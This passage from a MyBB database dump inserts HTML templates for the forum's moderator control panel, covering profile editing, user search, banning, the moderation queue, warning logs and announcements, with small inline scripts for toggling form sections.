{$bdaymonthsel[\'9\']}>{$lang->month_9}</option>\n <option value=\"10\" {$bdaymonthsel[\'10\']}>{$lang->month_10}</option>\n <option value=\"11\" {$bdaymonthsel[\'11\']}>{$lang->month_11}</option>\n <option value=\"12\" {$bdaymonthsel[\'12\']}>{$lang->month_12}</option>\n </select>\n </td>\n <td>\n <input type=\"text\" class=\"textbox\" size=\"4\" maxlength=\"4\" name=\"birthday_year\" value=\"{$mybb->input[\'birthday_year\']}\" />\n </td>\n </tr>\n <tr>\n <td colspan=\"3\"><span class=\"smalltext\">{$lang->website_url}</span></td>\n </tr>\n <tr>\n <td colspan=\"3\"><input type=\"text\" class=\"textbox\" name=\"website\" size=\"25\" maxlength=\"75\" value=\"{$mybb->input[\'website\']}\" /></td>\n </tr>\n </table>\n </fieldset>\n {$customfields}\n </td>\n <td width=\"50%\" class=\"trow1\" valign=\"top\">\n <fieldset class=\"trow2\">\n <legend><strong>{$lang->custom_usertitle}</strong></legend>\n <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\">\n <tr>\n <td><span class=\"smalltext\">{$lang->custom_usertitle_note}</span></td>\n </tr>\n <tr>\n <td><span class=\"smalltext\">{$lang->default_usertitle}</span></td>\n </tr>\n <tr>\n <td><span class=\"smalltext\"><strong>{$defaulttitle}</strong></span></td>\n </tr>\n <tr>\n <td><span class=\"smalltext\">{$lang->current_custom_usertitle}</span></td>\n </tr>\n <tr>\n <td><span class=\"smalltext\"><strong>{$user[\'usertitle\']}</strong></span></td>\n </tr>\n <tr>\n <td><span class=\"smalltext\">{$lang->new_custom_usertitle}</span></td>\n </tr>\n <tr>\n <td><input type=\"text\" class=\"textbox\" name=\"usertitle\" size=\"25\" maxlength=\"{$mybb->settings[\'customtitlemaxlength\']}\" value=\"{$newtitle}\" /></td>\n </tr>\n <tr>\n <td><span class=\"smalltext\"><input type=\"checkbox\" name=\"reverttitle\" id=\"reverttitle\" class=\"checkbox\" /> {$lang->revert_usertitle}</span></td>\n </tr>\n </table>\n </fieldset>\n <br />\n <fieldset class=\"trow2\">\n <legend><strong>{$lang->additional_contact_details}</strong></legend>\n <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\">\n <tr>\n <td><span class=\"smalltext\">{$lang->icq_number}</span></td>\n </tr>\n <tr>\n <td><input type=\"text\" class=\"textbox\" name=\"icq\" size=\"25\" value=\"{$mybb->input[\'icq\']}\" /></td>\n </tr>\n <tr>\n <td><span class=\"smalltext\">{$lang->aim_screenname}</span></td>\n </tr>\n <tr>\n <td><input type=\"text\" class=\"textbox\" name=\"aim\" size=\"25\" value=\"{$mybb->input[\'aim\']}\" /></td>\n </tr>\n <tr>\n <td><span class=\"smalltext\">{$lang->msn}</span></td>\n </tr>\n <tr>\n <td><input type=\"text\" class=\"textbox\" name=\"msn\" size=\"25\" value=\"{$mybb->input[\'msn\']}\" /></td>\n </tr>\n <tr>\n <td><span class=\"smalltext\">{$lang->yahoo_id}</span></td>\n </tr>\n <tr>\n <td><input type=\"text\" class=\"textbox\" name=\"yahoo\" size=\"25\" value=\"{$mybb->input[\'yahoo\']}\" /></td>\n </tr>\n </table>\n </fieldset>\n <br />\n <fieldset class=\"trow2\">\n <legend><strong>{$lang->moderation}</strong></legend>\n <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\">\n <tr>\n <td>\n<dl style=\"margin-top: 0; margin-bottom: 0;\">\n<dt><label><input type=\"checkbox\" name=\"moderateposting\" value=\"1\" {$modpost_checked} class=\"checkbox\" onclick=\"toggleSuspend(\'modposts\');\" id=\"modpost\" /> {$lang->moderate_posts}</label></dt>\n<dd style=\"margin-top: 4px;\" id=\"modposts_action\">\n<table cellpadding=\"4\">\n{$moderateposts_info}\n <tr>\n <td width=\"35%\">{$lang->modpost_length}</td>\n <td><input type=\"text\" name=\"modpost_time\" value=\"{$mybb->input[\'modpost_time\']}\" class=\"textbox\" style=\"width: 2em;\" /> {$modpost_options}</td>\n </tr>\n</table>\n</dd>\n</dl>\n </td>\n </tr>\n <tr>\n <td>\n<dl style=\"margin-top: 0; margin-bottom: 0;\">\n<dt><label><input type=\"checkbox\" name=\"suspendposting\" value=\"1\" {$suspost_checked} class=\"checkbox\" onclick=\"toggleSuspend(\'susposts\');\" id=\"suspost\" /> {$lang->suspend_posts}</label></dt>\n<dd style=\"margin-top: 4px;\" id=\"susposts_action\">\n<table cellpadding=\"4\">\n{$suspendposting_info}\n <tr>\n <td width=\"35%\">{$lang->suspost_length}</td>\n <td><input type=\"text\" name=\"suspost_time\" value=\"{$mybb->input[\'suspost_time\']}\" class=\"textbox\" style=\"width: 2em;\" /> {$suspost_options}</td>\n </tr>\n</table>\n</dd>\n</dl></td>\n </tr>\n </table>\n </fieldset>\n </td>\n </tr>\n <tr>\n <td colspan=\"2\" class=\"trow1\" valign=\"top\">\n <fieldset class=\"trow1\">\n <legend><strong>{$lang->signature}</strong></legend>\n <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\">\n<tr>\n<td class=\"trow1\" width=\"80%\">\n<textarea rows=\"15\" cols=\"70\" id=\"signature\" name=\"signature\">{$user[\'signature\']}</textarea>\n{$codebuttons}\n</td>\n</tr>\n{$suspend_signature}\n </table>\n </fieldset>\n </td>\n </tr>\n <tr>\n <td colspan=\"2\" class=\"trow1\" valign=\"top\">\n <fieldset class=\"trow2\">\n <legend><strong>{$lang->mod_notes}</strong></legend>\n <textarea name=\"usernotes\" id=\"usernotes\" rows=\"10\" cols=\"70\">{$user[\'usernotes\']}</textarea>\n </fieldset>\n </td>\n </tr>\n </table>\n <br />\n <div align=\"center\">\n <input type=\"hidden\" name=\"action\" value=\"do_editprofile\" />\n <input type=\"hidden\" name=\"uid\" value=\"{$user[\'uid\']}\" />\n <input type=\"submit\" class=\"button\" value=\"{$lang->update_profile}\" />\n </div>\n </td>\n </tr>\n </table>\n </form>\n {$footer}\n<script type=\"text/javascript\">\n<!--\n if(mod_posts == 0)\n {\n $(\'modposts_action\').hide();\n }\n\n if(susp_posts == 0)\n {\n $(\'susposts_action\').hide();\n }\n\n function toggleSuspend(action)\n {\n var item = action + \"_action\";\n\n if(action == \"modposts\")\n {\n $(\'susposts_action\').hide();\n $(\'suspost\').checked = false;\n\n if($(\"modpost\").checked == false)\n {\n $(\"modpost\").checked = false;\n $(\"modposts_action\").hide();\n }\n else\n {\n $(\"modpost\").checked = true;\n $(\"modposts_action\").show();\n }\n }\n\n if(action == \"susposts\")\n {\n $(\'modposts_action\').hide();\n $(\'modpost\').checked = false;\n\n if($(\"suspost\").checked == false)\n {\n $(\"suspost\").checked = false;\n $(\"susposts_action\").hide();\n }\n else\n {\n $(\"suspost\").checked = true;\n $(\"susposts_action\").show();\n }\n }\n }\n// -->\n</script>\n</body>\n</html>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('538', 'modcp_editprofile_signature', '<tr>\n<td class=\"trow1\" valign=\"top\">\n<script type=\"text/javascript\">\n<!--\n var sig_checked = \"{$checked}\";\n\n function toggleAction()\n {\n if($(\"suspend_action\").visible() == true)\n {\n $(\"suspend_action\").hide();\n }\n else\n {\n $(\"suspend_action\").show();\n }\n }\n// -->\n</script>\n<dl style=\"margin-top: 0; margin-bottom: 0; width: 100%;\">\n<dt><label><input type=\"checkbox\" name=\"suspendsignature\" value=\"1\" class=\"checkbox\" {$checked_item} onclick=\"toggleAction();\" /> {$lang->suspend_signature}</label></dt>\n<dd style=\"margin-top: 4px;\" id=\"suspend_action\">\n<table cellpadding=\"4\">\n{$suspendsignature_info}\n <tr>\n <td width=\"30%\">{$lang->suspend_length}</td>\n <td><input type=\"text\" name=\"action_time\" value=\"{$mybb->input[\'action_time\']}\" class=\"textbox\" style=\"width: 2em;\" /> {$action_options}</td>\n </tr>\n</table>\n</dd>\n</dl>\n<script type=\"text/javascript\">\n<!--\n if(sig_checked == 0)\n {\n $(\"suspend_action\").hide();\n }\n// -->\n</script>\n</td>\n</tr>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('539', 'modcp_editprofile_select', '<select name=\"{$select_name}\">\n {$selection_options}\n</select>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('540', 'modcp_editprofile_select_option', '<option value=\"{$key}\" {$selected}>{$value}</option>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('541', 'modcp_editprofile_suspensions_info', '<tr>\n <td colspan=\"2\" class=\"smalltext\"><em>{$suspension_info}</em></td>\n</tr>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('542', 'modcp_finduser', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->find_users}</title>\n{$headerinclude}\n</head>\n<body>\n {$header}\n <form action=\"modcp.php?action=finduser\" method=\"post\">\n <table width=\"100%\" border=\"0\" align=\"center\">\n <tr>\n {$modcp_nav}\n <td valign=\"top\">\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\" colspan=\"5\"><strong>{$lang->users}</strong></td>\n </tr>\n <tr>\n <td class=\"tcat\" width=\"30%\"><span class=\"smalltext\"><strong>{$lang->username}</strong></span></td>\n <td class=\"tcat\" align=\"center\" width=\"15%\"><span class=\"smalltext\"><strong>{$lang->usergroup}</strong></span></td>\n <td class=\"tcat\" align=\"center\" width=\"15%\"><span class=\"smalltext\"><strong>{$lang->regdate}</strong></span></td>\n <td class=\"tcat\" align=\"center\" width=\"15%\"><span class=\"smalltext\"><strong>{$lang->lastvisit}</strong></span></td>\n <td class=\"tcat\" align=\"right\" width=\"10%\"><span class=\"smalltext\"><strong>{$lang->postnum}</strong></span></td>\n </tr>\n {$users}\n </table>\n {$multipage}\n <br />\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\" colspan=\"2\"><strong>{$lang->find_users}</strong></td>\n </tr>\n <tr>\n <td class=\"trow1\" width=\"25%\"><strong>{$lang->username_contains}</strong></td>\n <td class=\"trow1\" width=\"75%\"><input type=\"text\" name=\"username\" id=\"username\" value=\"{$mybb->input[\'username\']}\" class=\"textbox\" /></td>\n </tr>\n <tr>\n <td class=\"trow1\" width=\"25%\"><strong>{$lang->sort_by}</strong></td>\n <td class=\"trow1\" width=\"75%\">\n <select name=\"sortby\">\n <option value=\"username\"{$sortbysel[\'username\']}>{$lang->username}</option>\n <option value=\"regdate\"{$sortbysel[\'regdate\']}>{$lang->regdate}</option>\n <option value=\"lastvisit\"{$sortbysel[\'lastvisit\']}>{$lang->lastvisit}</option>\n <option value=\"postnum\"{$sortbysel[\'postnum\']}>{$lang->postnum}</option>\n </select>\n {$lang->in}\n <select name=\"order\">\n <option value=\"asc\"{$ordersel[\'asc\']}>{$lang->asc}</option>\n <option value=\"desc\"{$ordersel[\'desc\']}>{$lang->desc}</option>\n </select>\n {$lang->order}\n </td>\n </tr>\n </table>\n <br />\n <div align=\"center\">\n <input type=\"submit\" class=\"button\" value=\"{$lang->find_users}\" />\n </div>\n </td>\n </tr>\n </table>\n </form>\n{$footer}\n<script type=\"text/javascript\" src=\"jscripts/autocomplete.js?ver=1400\"></script>\n<script type=\"text/javascript\">\n<!--\n if(use_xmlhttprequest == \"1\")\n {\n new autoComplete(\"username\", \"xmlhttp.php?action=get_users\", {valueSpan: \"username\"});\n }\n// -->\n</script>\n</body>\n</html>', '-2', '1405', '', '1339729416'); INSERT INTO mybb_templates VALUES('543', 'modcp_finduser_user', ' <tr>\n <td class=\"{$alt_row}\"><a href=\"modcp.php?action=editprofile&amp;uid={$user[\'uid\']}\">{$user[\'username\']}</a></td>\n <td class=\"{$alt_row}\" align=\"center\">{$usergroup}</td>\n <td class=\"{$alt_row}\" align=\"center\">{$regdate}, {$regtime}</td>\n <td class=\"{$alt_row}\" align=\"center\">{$lastdate}, {$lasttime}</td>\n <td class=\"{$alt_row}\" align=\"center\">{$user[\'postnum\']}</td>\n </tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('544', 'modcp_finduser_noresults', ' <tr>\n <td class=\"trow1\" align=\"center\" colspan=\"5\">{$lang->no_user_results}</td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('545', 'modcp_banning', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->ban_banned}</title>\n{$headerinclude}\n</head>\n<body>\n {$header}\n <table width=\"100%\" border=\"0\" align=\"center\">\n <tr>\n {$modcp_nav}\n <td valign=\"top\">\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\" colspan=\"4\">\n <div class=\"float_right\"><a href=\"modcp.php?action=banuser\">{$lang->ban_user}</a></div>\n <strong>{$lang->ban_banned}</strong></td>\n </tr>\n <tr>\n <td class=\"tcat\" width=\"25%\"><span class=\"smalltext\"><strong>{$lang->username}</strong></span></td>\n <td class=\"tcat\" align=\"center\" width=\"30%\"><span class=\"smalltext\"><strong>{$lang->reason}</strong></span></td>\n <td class=\"tcat\" align=\"center\" width=\"25%\"><span class=\"smalltext\"><strong>{$lang->ban_length}</strong></span></td>\n <td class=\"tcat\" align=\"center\" width=\"20%\"><span class=\"smalltext\"><strong>{$lang->ban_bannedby}</strong></span></td>\n </tr>\n {$bannedusers}\n </table>\n {$multipage}\n </td>\n </tr>\n </table>\n {$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('546', 'modcp_banuser', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->ban_user}</title>\n{$headerinclude}\n</head>\n<body>\n {$header}\n <table width=\"100%\" border=\"0\" align=\"center\">\n <tr>\n {$modcp_nav}\n <td valign=\"top\">\n {$errors}\n <form action=\"modcp.php\" method=\"post\">\n <input type=\"hidden\" name=\"action\" value=\"do_banuser\" />\n <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n <input type=\"hidden\" name=\"uid\" value=\"{$uid}\" />\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\" colspan=\"2\">\n {$lift_link}\n <strong>{$lang->ban_user}</strong>\n </td>\n </tr>\n {$banuser_username}\n <tr>\n <td class=\"trow2\" width=\"25%\"><strong>{$lang->ban_reason}</strong></td>\n <td class=\"trow2\" width=\"75%\"><input type=\"text\" class=\"textbox\" name=\"banreason\" value=\"{$banreason}\" size=\"25\" /></td>\n </tr>\n <tr>\n <td class=\"trow1\" width=\"25%\"><strong>{$lang->ban_movegroup}</strong></td>\n <td class=\"trow1\" width=\"75%\"><select name=\"usergroup\">{$bangroups}</select>\n </td>\n </tr>\n <tr>\n <td class=\"trow2\" width=\"25%\"><strong>{$lang->ban_liftafter}</strong></td>\n <td class=\"trow2\" width=\"75%\"><select name=\"liftafter\">{$liftlist}</select></td>\n </tr>\n </table>\n <br />\n <div align=\"center\">\n <input type=\"submit\" class=\"button\" name=\"updateban\" value=\"{$lang->ban}\" />\n </div>\n </form>\n </td>\n </tr>\n </table>\n {$footer}\n<script type=\"text/javascript\" src=\"jscripts/autocomplete.js?ver=1400\"></script>\n<script type=\"text/javascript\">\n<!--\n if(use_xmlhttprequest == \"1\")\n {\n new autoComplete(\"username\", \"xmlhttp.php?action=get_users\", {valueSpan: \"username\"});\n }\n// -->\n</script>\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('547', 'modcp_banuser_addusername', '<tr>\n <td class=\"trow1\" width=\"25%\"><strong>{$lang->ban_username}</strong></td>\n <td class=\"trow1\" width=\"75%\"><input type=\"text\" class=\"textbox\" name=\"username\" id=\"username\" value=\"{$username}\" size=\"25\" /></td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('548', 'modcp_banuser_editusername', '<tr>\n <td class=\"trow1\" width=\"25%\"><strong>{$lang->ban_username}</strong></td>\n <td class=\"trow1\" width=\"75%\">{$username}</td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('549', 'modcp_banning_ban', '<tr>\n <td class=\"{$trow}\">{$profile_link}{$edit_link}</td>\n <td class=\"{$trow}\" align=\"center\">{$banned[\'reason\']}</td>\n <td class=\"{$trow}\" align=\"center\">{$banlength}<br /><span class=\"smalltext\">{$timeremaining}</span></td>\n <td class=\"{$trow}\" align=\"center\">{$admin_profile}</td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('550', 'modcp_banning_nobanned', '<tr>\n <td class=\"trow1\" align=\"center\" colspan=\"4\">{$lang->no_banned}</td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('551', 'modcp_modqueue_empty', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->mod_queue}</title>\n{$headerinclude}\n</head>\n<body>\n {$header}\n <table width=\"100%\" border=\"0\" align=\"center\">\n <tr>\n {$modcp_nav}\n <td valign=\"top\">\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\"><strong>{$lang->mod_queue}</strong></td>\n </tr>\n <tr>\n <td class=\"trow1\" align=\"center\">{$lang->mod_queue_empty}</td>\n </tr>\n </table>\n </td>\n </tr>\n </table>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('552', 'modcp_modqueue_masscontrols', '<ul class=\"modqueue_mass\">\n <li><a href=\"#\" class=\"mass_ignore\" onclick=\"$$(\'input.radio_ignore\').each(function(e) { e.checked = true; }); return false;\">{$lang->mark_all_ignored}</a></li>\n <li><a href=\"#\" class=\"mass_delete\" onclick=\"$$(\'input.radio_delete\').each(function(e) { e.checked = true; }); return false;\">{$lang->mark_all_deletion}</a></li>\n <li><a href=\"#\" class=\"mass_approve\" onclick=\"$$(\'input.radio_approve\').each(function(e) { e.checked = true; }); return false;\">{$lang->mark_all_approved}</a></li>\n</ul>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('553', 'modcp_modqueue_threads_empty', '<tr>\n <td class=\"trow1\" align=\"center\" colspan=\"3\">{$lang->mod_queue_threads_empty}</td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('554', 'modcp_modqueue_posts_empty', '<tr>\n <td class=\"trow1\" align=\"center\" colspan=\"3\">{$lang->mod_queue_posts_empty}</td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('555', 'modcp_modqueue_attachments_empty', '<tr>\n <td class=\"trow1\" align=\"center\" colspan=\"6\">{$lang->mod_queue_attachments_empty}</td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('556', 'modcp_lastattachment', '<span class=\"smalltext\">\n<a href=\"{$attachment[\'link\']}#pid{$attachment[\'pid\']}\"><strong>{$attachment[\'filename\']}</strong></a>\n<br />{$attachment[\'date\']} {$attachment[\'time\']}<br />{$lang->by} {$attachment[\'profilelink\']}</span>\n', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('557', 'modcp_lastthread', '<span class=\"smalltext\">\n<a href=\"{$thread[\'link\']}\" title=\"{$thread[\'fullsubject\']}\"><strong>{$thread[\'subject\']}</strong></a>\n<br />{$thread[\'date\']} {$thread[\'time\']}<br />{$lang->by} {$thread[\'profilelink\']}</span>\n', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('558', 'modcp_lastpost', '<span class=\"smalltext\">\n<a href=\"{$post[\'link\']}#pid{$post[\'pid\']}\" title=\"{$post[\'fullsubject\']}\"><strong>{$post[\'subject\']}</strong></a>\n<br />{$post[\'date\']} {$post[\'time\']}<br />{$lang->by} {$post[\'profilelink\']}</span>\n', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('559', 'modcp_warninglogs', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->warning_logs}</title>\n{$headerinclude}\n</head>\n<body>\n {$header}\n <table width=\"100%\" border=\"0\" align=\"center\">\n <tr>\n {$modcp_nav}\n <td valign=\"top\">\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\" colspan=\"6\"><strong>{$lang->warning_logs}</strong></td>\n </tr>\n <tr>\n <td class=\"tcat\" width=\"15%\"><strong>{$lang->warned_user}</strong></td>\n <td class=\"tcat\" width=\"25%\"><strong>{$lang->warning}</strong></td>\n <td class=\"tcat\" width=\"20%\" align=\"center\"><strong>{$lang->date_issued}</strong></td>\n <td class=\"tcat\" width=\"20%\" align=\"center\"><strong>{$lang->expires}</strong></td>\n <td class=\"tcat\" width=\"15%\"><strong>{$lang->issued_by}</strong></td>\n <td class=\"tcat\" width=\"1%\" align=\"center\"><strong>{$lang->details}</strong></td>\n </tr>\n {$warning_list}\n </table>\n {$multipage}\n <br />\n <form action=\"modcp.php\" method=\"get\">\n <input type=\"hidden\" name=\"action\" value=\"warninglogs\" />\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\" colspan=\"2\"><strong>{$lang->filter_warning_logs}</strong></td>\n </tr>\n <tr>\n <td class=\"trow1\" width=\"25%\"><strong>{$lang->filter_warned_user}</strong></td>\n <td class=\"trow1\" width=\"75%\"><input type=\"text\" name=\"filter[username]\" id=\"username\" value=\"{$mybb->input[\'filter\'][\'username\']}\" class=\"textbox\" /></td>\n </tr>\n <tr>\n <td class=\"trow2\" width=\"25%\"><strong>{$lang->filter_issued_by}</strong></td>\n <td class=\"trow2\" width=\"75%\"><input type=\"text\" name=\"filter[mod_username]\" value=\"{$mybb->input[\'filter\'][\'mod_username\']}\" class=\"textbox\" /></td>\n </tr>\n <tr>\n <td class=\"trow1\" width=\"25%\"><strong>{$lang->filter_reason}</strong></td>\n <td class=\"trow1\" width=\"75%\"><input type=\"text\" name=\"filter[reason]\" value=\"{$mybb->input[\'filter\'][\'reason\']}\" class=\"textbox\" /></td>\n </tr>\n <tr>\n <td class=\"trow2\" width=\"25%\"><strong>{$lang->sort_by}</strong></td>\n <td class=\"trow2\" width=\"75%\">\n <select name=\"filter[sortby]\">\n <option value=\"username\"{$sortbysel[\'username\']}>{$lang->username}</option>\n <option value=\"issuedby\"{$sortbysel[\'issuedby\']}>{$lang->issued_by}</option>\n <option value=\"dateline\"{$sortbysel[\'dateline\']}>{$lang->issued_date}</option>\n <option value=\"expires\"{$sortbysel[\'expires\']}>{$lang->expiry_date}</option>\n </select>\n {$lang->in}\n <select name=\"filter[order]\">\n <option value=\"asc\"{$ordersel[\'asc\']}>{$lang->asc}</option>\n <option value=\"desc\"{$ordersel[\'desc\']}>{$lang->desc}</option>\n </select>\n {$lang->order}\n </td>\n </tr>\n <tr>\n <td class=\"trow1\" width=\"25%\"><strong>{$lang->per_page}</strong></td>\n <td class=\"trow1\" width=\"75%\"><input type=\"text\" name=\"filter[per_page]\" value=\"{$per_page}\" class=\"textbox\" /></td>\n </tr>\n </table>\n <br />\n <div align=\"center\">\n <input type=\"submit\" class=\"button\" value=\"{$lang->filter_warning_logs}\" />\n </div>\n </form>\n </td>\n </tr>\n </table>\n {$footer}\n<script type=\"text/javascript\" src=\"jscripts/autocomplete.js?ver=1400\"></script>\n<script type=\"text/javascript\">\n<!--\n if(use_xmlhttprequest == \"1\")\n {\n new autoComplete(\"username\", \"xmlhttp.php?action=get_users\", {valueSpan: \"username\"});\n }\n// -->\n</script>\n</body>\n</html>', '-2', '1405', '', '1339729416'); INSERT INTO mybb_templates VALUES('560', 'modcp_warninglogs_nologs', ' <tr>\n <td class=\"trow1\" colspan=\"6\">{$lang->no_warning_logs}</td>\n </tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('561', 'modcp_warninglogs_warning', ' <tr>\n <td class=\"{$trow}\">{$username_link}</td>\n <td class=\"{$trow}\">{$title} ({$points})</td>\n <td class=\"{$trow}\" align=\"center\">{$issued_date}</td>\n <td class=\"{$trow}\" align=\"center\">{$expire_date}{$revoked_text}</td>\n <td class=\"{$trow}\">{$mod_username_link}</td>\n <td class=\"{$trow}\" align=\"center\"><a href=\"warnings.php?action=view&amp;wid={$row[\'wid\']}\">{$lang->view}</a></td>\n </tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('562', 'modcp_warninglogs_warning_revoked', '<br /><span class=\"smalltext\"><strong>{$lang->revoked}</strong> {$revoked_date}</span>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('563', 'modcp_announcements_forum', ' <tr>\n <td class=\"{$trow}\"><div style=\"padding-left: {$padding}px;\"><strong>{$forum[\'name\']}</strong></div></td>\n <td class=\"{$trow}\" colspan=\"2\" align=\"center\"><a href=\"modcp.php?action=new_announcement&amp;fid={$forum[\'fid\']}\">{$lang->add_announcement}</a></td>\n </tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('564', 'modcp_announcements_forum_nomod', ' <tr>\n <td class=\"{$trow}\"><div style=\"padding-left: {$padding}px;\"><strong>{$forum[\'name\']}</strong></div></td>\n <td class=\"{$trow}\" colspan=\"2\" align=\"center\">&nbsp;</td>\n </tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('565', 'modcp_announcements_announcement', ' <tr>\n <td class=\"{$trow}\"><div style=\"padding-left: {$padding}px;\">{$icon}<a href=\"modcp.php?action=edit_announcement&amp;aid={$aid}\">{$subject}</a></div></td>\n <td class=\"{$trow}\" align=\"center\"><a href=\"modcp.php?action=edit_announcement&amp;aid={$aid}\">{$lang->edit}</a></td>\n <td class=\"{$trow}\" align=\"center\"><a href=\"modcp.php?action=delete_announcement&amp;aid={$aid}\">{$lang->delete}</a></td>\n </tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('566', 'modcp_no_announcements_forum', ' <tr>\n <td class=\"trow1\" colspan=\"3\">{$lang->no_forum_announcements}</td>\n </tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('567', 'modcp_no_announcements_global', ' <tr>\n <td class=\"trow1\" colspan=\"3\">{$lang->no_global_announcements}</td>\n </tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('568', 'modcp_announcements_announcement_global', ' <tr>\n <td class=\"{$trow}\">{$icon}<a href=\"modcp.php?action=edit_announcement&amp;aid={$aid}\">{$subject}</a></td>\n <td class=\"{$trow}\" align=\"center\"><a href=\"modcp.php?action=edit_announcement&amp;aid={$aid}\">{$lang->edit}</a></td>\n <td class=\"{$trow}\" align=\"center\"><a href=\"modcp.php?action=delete_announcement&amp;aid={$aid}\">{$lang->delete}</a></td>\n </tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('569', 'modcp_announcements_global', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\" colspan=\"3\"><div class=\"float_right\"><a href=\"modcp.php?action=new_announcement&amp;fid=-1\">{$lang->add_global_announcement}</a></div><strong>{$lang->global_announcements}</strong></td>\n </tr>\n <tr>\n <td class=\"tcat\"><strong>{$lang->announcement}</strong></td>\n <td class=\"tcat\" width=\"200\" colspan=\"2\" align=\"center\"><strong>{$lang->controls}</strong></td>\n </tr>\n {$announcements_global}\n </table>\n <br />', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('570', 'modcp_announcements', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->manage_announcement}</title>\n{$headerinclude}\n</head>\n<body>\n {$header}\n <table width=\"100%\" border=\"0\" align=\"center\">\n <tr>\n {$modcp_nav}\n <td valign=\"top\">\n {$announcements_global}\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\" colspan=\"3\"><strong>{$lang->forum_announcements}</strong></td>\n </tr>\n <tr>\n <td class=\"tcat\"><strong>{$lang->announcement}</strong></td>\n <td class=\"tcat\" width=\"200\" colspan=\"2\" align=\"center\"><strong>{$lang->controls}</strong></td>\n </tr>\n {$announcements_forum}\n </table>\n </td>\n </tr>\n </table>\n {$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('571', 'modcp_announcements_new', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->manage_announcement}</title>\n{$headerinclude}\n</head>\n<body>\n {$header}\n <form action=\"modcp.php\" method=\"post\" enctype=\"multipart/form-data\">\n <input type=\"hidden\" name=\"action\" value=\"do_new_announcement\" />\n <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n <input type=\"hidden\" name=\"fid\" value=\"{$announcement_fid}\" />\n <table width=\"100%\" border=\"0\" align=\"center\">\n <tr>\n {$modcp_nav}\n <td valign=\"top\">\n {$errors}\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\" colspan=\"6\"><strong>{$lang->add_announcement}</strong></td>\n </tr>\n <tr>\n <td 